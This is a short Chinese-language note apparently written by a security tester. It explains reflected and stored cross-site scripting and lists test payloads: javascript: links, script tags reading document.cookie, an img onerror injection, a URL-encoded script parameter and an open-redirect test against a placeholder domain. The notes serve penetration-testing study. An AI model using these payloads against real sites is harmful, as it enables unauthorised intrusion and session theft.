測試的時候會涉及到xss測試,下面簡要整理下xss的知識
xss跨站腳本特點就是能注入惡意的HTML/JS代碼到用戶瀏覽器,劫持用戶會話,如果確認存在漏洞,會隨着注入的內容不同而產生危害比如:竊取cookie,網頁掛馬,惡意操作,跨站蠕蟲等等
分類:
反射型:非持久,一般為一個url,需要用戶單擊,在url中參數傳入
持久型:常存在於評論等交互中,常見於<textarea>這種標簽,可用於掛馬釣魚滲透等
可見,為了防止xss,字符過濾可以有效的較少被攻擊的危害,但是xss攻擊不止這么簡單,
它還可以繞過服務端的xss過濾!!!待續
ps:常用的xss攻擊語句列表
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 英文
http://drops.wooyun.org/tips/1955 中文
如果可以發現最基礎的xss可以執行,那么就可以注入其他有害的操作或者獲取信息
例如一些javacript事件:onerror,onfocus,onclick,ontimeout。。。
http://wenku.baidu.com/link?url=q9-QLRlKm788Hdn7F0-Fy2Ujqg8N995-DLk4cS_cXdds1h9lQIvtGf78KbUM55GtKiS6qTwd--Aj6YSsEh2YmiB4VZ611J3pwdj0AeSeApi
--------------------------------------------------------------------------
/***********工作中用到滲透語句:******************/
1. 跨站攻擊
輸入框測試
<--測試方法-->
(1)<a href="javascript:alert(1)"/>我的評論</a>
(2)cookies
"/><script>confirm(document.cookie)
<script>confirm(document.cookie)</scr
(3)<script>alert(1)</script>
2. URL跳轉漏洞
<--測試方法-->
修改參數中的合法URL為非法URL,然后查看是否能正常跳轉或者響應包是否包含了任意的構造URL
例子:
(1)http:/xxx.com.cn/post.do?retUrl=javascript:alert(document.cookie)
直接注入到URl里面了
(2)訪問http://xxx.com.cn/login.do?retUrl=http://www.baidu.com
登錄后即可跳轉到www.baidu.com
3. 存儲型跨站
<--測試方法-->
會把攻擊者的數據存儲在服務器端,攻擊行為將伴隨着攻擊數據一直存在
例子:
在頁面源代碼中修改回復內容添加
<img src=http://xxx.com.cn/tesad.gif onerror=alert(666) />
4.參數跨站
<--測試方法-->
http://xxx.com.cn/usr/user.jsp?param_prov=&gender=&prov=&city=&birthday=%3Cscript%3Ealert%281%29%3C/script%3E